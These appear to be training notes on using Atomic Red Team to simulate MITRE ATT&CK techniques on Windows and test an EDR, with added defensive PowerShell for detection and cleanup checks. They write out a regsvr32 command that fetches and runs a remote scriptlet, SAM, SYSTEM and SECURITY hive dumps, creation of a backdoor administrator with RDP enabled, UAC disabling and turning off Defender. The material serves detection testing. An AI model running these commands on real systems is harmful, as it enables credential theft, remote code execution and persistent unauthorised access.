Atomic Red Team

The document describes how to use the Atomic Red Team framework to simulate security attacks and test endpoint detection and response tools. It provides commands to enable guest access, dump credentials from the registry, and disable UAC using the Windows Registry.

atomicRedTeam:

> Used to check the security of a system by running simulated attacks mapped to the MITRE ATT&CK
framework.

> Set up the machine for the simulated attack::

> Go to https://github.com/redcanaryco/invoke-atomicredteam and download the zip file.

> Create a folder on the C: drive named AtomicRedTeam.

> Copy the zip file into that folder and unzip it. BTW, we have to update
Windows Security and TURN OFF real-time protection.

> invoke-atomicredteam-master > invoke-atomicredteam and atomic-red-team-master >
atomic-red-team: two folders are there to unzip.

> From the PowerShell window prompt run : powershell -exec bypass

> run : Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser

> Importing the module : run the script: > Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

> Now simulate an attack from the MITRE ATT&CK framework and select a technique such as
T1016: System Network Configuration Discovery.

> Get-Module lists the installed modules; Invoke-AtomicRedTeam should appear, with its commands
in the ExportedCommands field.

> run : Invoke-AtomicTest T1016 -ShowDetailsBrief

> run : Invoke-AtomicTest T1016 -ShowDetails

> run : Invoke-AtomicTest T1016 -CheckPrereqs (checks whether the system meets the test prerequisites)

> run : Invoke-AtomicTest T1016 -GetPrereqs (installs any missing prerequisites)

> run the test : Invoke-AtomicTest T1016

> run a specific test of T1016 : Invoke-AtomicTest T1016 -TestNumbers 2 >
(T1016-2: List Windows Firewall Rules.)

> Now check another technique, under Privilege Escalation: Process Injection :
T1055

> run : Invoke-AtomicTest T1055 -ShowDetailsBrief

> run : Invoke-AtomicTest T1055 -ShowDetails

> run a specific test of T1055 : Invoke-AtomicTest T1055 -TestNumbers 2 >
(T1055-2: Remote Process Injection in LSASS via Mimikatz.)

> clean up the test : Invoke-AtomicTest T1055 -Cleanup

> clean up the test : Invoke-AtomicTest T1016 -Cleanup


EDR : Endpoint detection and response refers to a category of tools used to detect
and investigate threats on endpoints. EDR tools typically provide detection,
investigation, threat hunting, and response capabilities.

Why do I need an EDR solution?

EDR solutions are very effective in collecting continuous information on malware
footprints and other types of potential cyber threats to the network. Such data is
stored on the network endpoints, which helps in preparing suitable incident response
and management strategies.

What is the difference between EDR and SIEM?

EDR is better at detecting threats that are already on the endpoint, such as
malware infections. EDR can also collect detailed information about threats, which
can be helpful for investigating and responding to incidents. SIEM is better at
detecting threats that are coming into the network, such as malicious traffic.

What is the disadvantage of EDR?

While EDR solutions offer robust protection against advanced threats, they also
come with certain drawbacks. One of the primary disadvantages is the possibility of
false positives, which can lead to unnecessary investigations, wasting valuable
time and resources.

EDR can detect threats like ransomware and malware.

EDR solutions keep track of all devices, hunting down any suspicious movements on
the network. They collect information from endpoints and use this to stop threats
and assess previous and ongoing attacks. Legacy tools like antivirus software and
firewalls can detect known threats through signature-based detection.

endpointDetectionResponseEDR:

> Endpoint Detection and Response (EDR) is also known as Endpoint Threat Detection
and Response (ETDR).

> Disable Microsoft Defender before executing, monitoring or implementing any red
team test activity or Atomic Red Team MITRE ATT&CK framework command.
>> Set-MpPreference -DisableRealtimeMonitoring $true

> BLUESPAWN is an EDR-style test tool developed by students at the University of
Virginia; it is intended for testing, not for production use.

> Installing BLUESPAWN as the stand-in EDR:
(https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/bluespawn/Bluespawn.md)
> BLUESPAWN only detects unusual behaviour; it does not block it.
>> ./BLUESPAWN-client-x64.exe --monitor --level Cursory (it loads a set of MITRE ATT&CK tactics
and techniques for monitoring purposes)

> Use Atomic Red Team to test how well the BLUESPAWN EDR works.
(https://github.com/redcanaryco/atomic-red-team)
>> Install the Atomic Red Team module :
>>> cd c:\AtomicRedTeam\invoke-atomicredteam\
>>> Install-Module -Name powershell-yaml
>>> Import-Module .\Invoke-AtomicRedTeam.psm1
>>> Invoke-AtomicTest All
After the tests have been run and analysed, the next step is to clean up the machine.
>>> Invoke-AtomicTest All -Cleanup
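As an added example (not part of these notes or of the Invoke-AtomicRedTeam project), the PowerShell wrapper below runs one atomic test unattended, then checks whether the host's own process-creation telemetry recorded it, and cleans up afterwards. It is the same "run a test, see whether the sensor noticed" loop the notes describe with BLUESPAWN and Invoke-AtomicTest All, done one test at a time so that a miss can be tied to a specific technique. It assumes Invoke-AtomicRedTeam is already imported as above and that Sysmon (event ID 1) or Security auditing of process creation (event ID 4688 with command-line logging enabled) is turned on; the function name and the 'netsh' fragment used for T1016 test 2 are assumptions of this example.

```powershell
# Added example, not code from the original notes or from Invoke-AtomicRedTeam.
# Assumes Invoke-AtomicRedTeam is imported and that Sysmon (ID 1) or Security 4688
# process-creation auditing with command-line logging is on. Function name is hypothetical.
function Invoke-AtomicTestWithTelemetryCheck {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Technique,         # e.g. 'T1016' (the T prefix is required)
        [Parameter(Mandatory)] [int]    $TestNumber,        # e.g. 2
        [Parameter(Mandatory)] [string] $ExpectedFragment,  # text the test's command line is known to contain
        [string] $LogName       = 'Microsoft-Windows-Sysmon/Operational',
        [int]    $EventId       = 1,                        # use -LogName Security -EventId 4688 without Sysmon
        [int]    $SettleSeconds = 5
    )

    # Take the timestamp a little early so events written in the same second are not missed.
    $start   = (Get-Date).AddSeconds(-2)
    $execLog = Join-Path $env:TEMP ("atomic-{0}-{1}.csv" -f $Technique, $TestNumber)

    # 1. Run exactly one test, unattended, and keep Invoke-AtomicTest's own execution log.
    Invoke-AtomicTest $Technique -TestNumbers $TestNumber -Confirm:$false -ExecutionLogPath $execLog

    # 2. Give the sensor time to flush, then pull process-creation events written since $start.
    Start-Sleep -Seconds $SettleSeconds
    $filter = @{ LogName = $LogName; Id = $EventId; StartTime = $start }
    $events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)

    # 3. Did any of those events carry the command line the test is known to run?
    $hits = @($events | Where-Object { $_.Message -like "*$ExpectedFragment*" })

    # 4. Always undo the test's changes, whether or not it was observed.
    Invoke-AtomicTest $Technique -TestNumbers $TestNumber -Cleanup -Confirm:$false

    [pscustomobject]@{
        Technique      = $Technique
        TestNumber     = $TestNumber
        EventsInWindow = $events.Count
        Observed       = ($hits.Count -gt 0)   # telemetry saw it; whether the EDR alerted is a separate question
        FirstSeen      = if ($hits.Count -gt 0) { ($hits | Sort-Object TimeCreated)[0].TimeCreated } else { $null }
        ExecutionLog   = $execLog
    }
}

# Usage: T1016 test 2 (List Windows Firewall Rules) is assumed to run netsh, so look for that
# fragment. Confirm the actual command first with: Invoke-AtomicTest T1016 -ShowDetails
Invoke-AtomicTestWithTelemetryCheck -Technique T1016 -TestNumber 2 -ExpectedFragment 'netsh'
```

On a host without Sysmon, call it with `-LogName Security -EventId 4688`; that log only carries the command line when the "Include command line in process creation events" policy is enabled, otherwise the fragment will never appear in the message and every test reports as unobserved.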

Lab Test :

> basic Atomic Test (Regsvr32)
> chain reaction
> measure progress and impact

Chaining Multiple Atomic Tests: RedCanaryLabsOne.bat

:: Step 1: A payload executes Regsvr32.exe as seen in LAB one T1117

>> regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

:: Step 2: This payload will execute a discovery sequence T1087

>> net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft"

:: Step 3: We will set up some persistence by creating a scheduled task T1053

>> SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10

> We will also just go ahead and clean up the task.

>> SCHTASKS /Delete /TN Spawn /F

ATOMIC TEST #1: GUEST ACCOUNT ENABLED >> T1078.001

> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

>> Explanation of the command:

This command modifies the Windows Registry to allow Remote Desktop connections by
setting the value "AllowTSConnections" under the specified registry key.

:: reg add: This command is used to add or overwrite a registry entry.
:: "HKLM\System\CurrentControlSet\Control\Terminal Server": This is the registry
key where the setting for Remote Desktop connections is located.
:: /v "AllowTSConnections": This specifies the name of the registry value we want
to modify.
:: /t REG_DWORD: This specifies the data type of the registry value as DWORD.
:: /d 0x1: This sets the data of the registry value to 1, which means Remote
Desktop connections are allowed.
:: /f: This forces the command to execute without asking for confirmation.

> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

>> Explanation of the command:

This command modifies the Windows Registry to enable Remote Desktop connections by
changing the value of fDenyTSConnections under the specified registry key.

:: reg add: This command is used to add or overwrite a registry entry.
:: "HKLM\System\CurrentControlSet\Control\Terminal Server": This is the registry
key where the setting for Remote Desktop connections is located.
:: /v fDenyTSConnections: This specifies the name of the registry value we want to
modify.
:: /t REG_DWORD: This specifies the data type of the registry value as DWORD.
:: /d 0: This sets the data of the registry value to 0, which means Remote Desktop
connections are enabled (a value of 1 denies them).
:: /f: This forces the command to execute without asking for confirmation.

> net localgroup "Remote Desktop Users" guest_user /add

This command adds the user account named "guest_user" to the "Remote Desktop Users"
group, allowing it to connect to the system via Remote Desktop.

> net localgroup administrators guest_user /add

This command adds guest_user to the local Administrators group.

> net user guest_user guest_password /add

This creates a new local user account named guest_user with the password guest_password
from the command prompt.

> net user guest_user /active:yes

This activates (enables) the guest_user account.

ATOMIC TEST #2: REGISTRY DUMP OF SAMS, CREDS AND SECRETS >> T1003.002

> Local SAM :: HKLM\sam
> Cached credentials :: HKLM\system
> LSA secrets :: HKLM\security

> reg save HKLM\sam %temp%\sam

Explanation of the command:

:: reg save: This command is used to save a copy of a registry key and its subkeys
and values to a file.
:: HKLM\sam: This specifies the registry key to be saved. In this case, it's the
SAM registry hive, which contains user account information.
:: "%temp%\sam": This specifies the path and filename where the registry hive will
be saved. %temp% is an environment variable representing the temporary directory,
and "sam" is the filename.

> reg save HKLM\system %temp%\system

> reg save HKLM\security %temp%\security

Cleanup Commands ::

> del %temp%\sam >nul 2> nul

Explanation of the command:

:: del: This command is used to delete files.
:: "%temp%\sam": This specifies the file path to delete. %temp% is an environment
variable that represents the temporary directory, and "sam" is the name of the file
to be deleted.
:: >nul: This part of the command redirects the normal output (stdout) to nul,
which essentially discards it. This prevents any messages about the deletion from
being displayed.
:: 2>nul: This part of the command redirects error output (stderr) to nul,
discarding any error messages that might occur during the deletion process.

This command will attempt to delete the "sam" file from the temporary directory
silently, without displaying any messages, whether the deletion is successful or
not.

> del %temp%\system >nul 2> nul

> del %temp%\security >nul 2> nul
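As an added example (not part of these notes), here are two defender-side checks for what Atomic Test #2 leaves behind: a predicate that recognises a process command line exporting the SAM, SYSTEM or SECURITY hive with reg.exe, applied to recent process-creation events, and a scan that finds dumped hive files by their "regf" file header rather than by the filename the cleanup commands expect. The function names are hypothetical and the sample command lines are constructed for the example, not captured from a real host.

```powershell
# Added example, not from the original notes. Hypothetical function names;
# the sample command lines below are constructed, not captured from a real host.

function Test-HiveDumpCommandLine {
    param([Parameter(Mandatory)] [string] $CommandLine)
    # reg or reg.exe (bare, quoted, or with a full path) followed by the save/export verb ...
    $verb = '(^|[\s"\\])reg(\.exe)?"?\s+(save|export)\b'
    # ... aimed at one of the three hives holding SAM, cached creds or LSA secrets.
    # (?!\\) avoids matching a save of a deeper sub-key such as HKLM\SYSTEM\CurrentControlSet\...
    $hive = '\b(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b(?!\\)'
    return [bool](($CommandLine -imatch $verb) -and ($CommandLine -imatch $hive))
}

# Constructed samples: only the first two are credential-hive dumps.
$SampleCommandLines = @(
    'reg save HKLM\sam %temp%\sam',
    '"C:\Windows\System32\reg.exe" save "HKEY_LOCAL_MACHINE\SECURITY" C:\Users\Public\sec.hiv',
    'reg query "HKLM\SOFTWARE\Microsoft"',             # discovery, not a dump
    'reg save HKCU\Software\Contoso C:\tmp\app.hiv'    # user hive, not a credential store
)

function Find-HiveDumpEvents {
    param([datetime] $Since = (Get-Date).AddHours(-24))
    # Security 4688 only carries the command line when "Include command line in process
    # creation events" is enabled; Sysmon event 1 carries it by default. Query both.
    $filters = @(
        @{ LogName = 'Security'; Id = 4688; StartTime = $Since },
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Where-Object { Test-HiveDumpCommandLine -CommandLine $_.Message } |
            ForEach-Object {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Log     = $f.LogName
                    Id      = $_.Id
                    Summary = ($_.Message -split "`n")[0]
                }
            }
    }
}

function Find-DumpedHiveFiles {
    param([string[]] $Paths = @($env:TEMP, "$env:SystemDrive\Users\Public"))
    # Every registry hive file starts with the ASCII signature "regf", whatever it was named.
    foreach ($dir in $Paths) {
        Get-ChildItem -Path $dir -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            try {
                $fs = [System.IO.File]::OpenRead($_.FullName)
                try {
                    $buf = New-Object byte[] 4
                    $n   = $fs.Read($buf, 0, 4)
                } finally { $fs.Dispose() }
                if ($n -eq 4 -and [System.Text.Encoding]::ASCII.GetString($buf, 0, 4) -ceq 'regf') {
                    $_.FullName
                }
            } catch { }   # locked or unreadable file: skip it
        }
    }
}

# Usage: run the predicate over the constructed samples (expect True, True, False, False).
$SampleCommandLines | ForEach-Object { '{0,-5} {1}' -f (Test-HiveDumpCommandLine $_), $_ }
# On a real host:
#   Find-HiveDumpEvents    # matching process-creation events from the last 24 hours
#   Find-DumpedHiveFiles   # hive files left in %TEMP% and Users\Public after a test
```

Running Find-DumpedHiveFiles before and after `Invoke-AtomicTest T1003.002 -Cleanup` is a quick way to confirm that the three `del` commands above actually removed the copies, and it also catches copies written under another name.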

ATOMIC TEST #3: DISABLE UAC USING reg.exe >> T1548.002

Disable User Account Control (UAC) using the built-in tool reg.exe by changing the
registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
from 1 to 0.

> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

This command adds or modifies the registry entry that controls User Account Control
(UAC) on a Windows system.

:: reg.exe ADD: This command is used to add a new registry entry or modify an
existing one.
:: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: This specifies
the registry key where the UAC settings are located.
:: /v EnableLUA: This specifies the name of the registry entry to be added or
modified. EnableLUA stands for "Enable User Account Control."
:: /t REG_DWORD: This specifies the data type of the registry entry as DWORD (a 32-
bit integer).
:: /d 0: This sets the data of the registry entry to 0, which typically means that
User Account Control (UAC) is disabled. (Setting it to 1 would enable UAC.)
:: /f: This flag is used to force the operation without prompting for confirmation.

Please be aware that modifying UAC settings can significantly affect the security
and stability of your system. Disabling UAC may expose your system to potential
security risks, so it should be done with caution and only if absolutely necessary.

Cleanup Commands:

> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

:: /d 1: This sets the data of the registry entry to 1, enabling User Account
Control (UAC).
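As an added example (not part of these notes), the following PowerShell reads back every setting that Atomic Test #1 (T1078.001) and Atomic Test #3 (T1548.002) change: the two Terminal Server values, the EnableLUA value, membership of the Remote Desktop Users and Administrators groups, and whether the guest_user account exists. Run it before a test to record the baseline and after the cleanup commands to confirm they restored it. The function names and the expected-member lists are assumptions of this example; the registry paths and value names are the ones the notes use.

```powershell
# Added example, not from the original notes. Hypothetical function names.
# Reads back the settings that Atomic Test #1 and Atomic Test #3 change so that
# the cleanup can be verified rather than assumed.

function Get-RegistryValueOrNull {
    param([string] $Path, [string] $Name)
    # Returns $null when the key or value is absent instead of throwing.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-LocalGroupAccountNames {
    param([string] $Group)
    # Get-LocalGroupMember reports COMPUTER\name or DOMAIN\name; keep only the account part.
    @(Get-LocalGroupMember -Group $Group -ErrorAction SilentlyContinue |
        ForEach-Object { ($_.Name -split '\\')[-1] })
}

function Get-AtomicDriftReport {
    param(
        # Accounts allowed in these groups on this host; anything else is flagged.
        [string[]] $ExpectedRdpUsers = @(),
        [string[]] $ExpectedAdmins   = @('Administrator')
    )
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $uac = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    $fDeny     = Get-RegistryValueOrNull $ts  'fDenyTSConnections'   # test #1 sets this to 0
    $allowTS   = Get-RegistryValueOrNull $ts  'AllowTSConnections'   # test #1 sets this to 1
    $enableLua = Get-RegistryValueOrNull $uac 'EnableLUA'            # test #3 sets this to 0

    $unexpectedRdp    = @(Get-LocalGroupAccountNames 'Remote Desktop Users' | Where-Object { $_ -notin $ExpectedRdpUsers })
    $unexpectedAdmins = @(Get-LocalGroupAccountNames 'Administrators'       | Where-Object { $_ -notin $ExpectedAdmins })
    $guestExists      = [bool](Get-LocalUser -Name 'guest_user' -ErrorAction SilentlyContinue)

    # An absent EnableLUA value means the default, which is UAC enabled.
    $uacEnabled = ($enableLua -ne 0)

    [pscustomobject]@{
        RdpEnabled         = ($fDeny -eq 0)
        AllowTSConnections = $allowTS
        UacEnabled         = $uacEnabled
        UnexpectedRdpUsers = $unexpectedRdp
        UnexpectedAdmins   = $unexpectedAdmins
        GuestUserExists    = $guestExists
        # RDP state is not part of Clean because it may legitimately be on before the test;
        # compare RdpEnabled against the baseline report instead.
        Clean              = $uacEnabled -and ($unexpectedRdp.Count -eq 0) -and
                             ($unexpectedAdmins.Count -eq 0) -and -not $guestExists
    }
}

# Usage: capture a baseline, run the tests and their cleanup, then compare.
$before = Get-AtomicDriftReport
# ... Invoke-AtomicTest T1078.001 ; Invoke-AtomicTest T1548.002 ; both with -Cleanup ...
$after  = Get-AtomicDriftReport
$after | Format-List
if ($after.RdpEnabled -ne $before.RdpEnabled) { Write-Warning 'RDP state differs from baseline' }
```

Get-LocalGroupMember and Get-LocalUser come with Windows PowerShell 5.1 (Microsoft.PowerShell.LocalAccounts); running the report from an elevated prompt avoids access-denied results on the HKLM keys.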
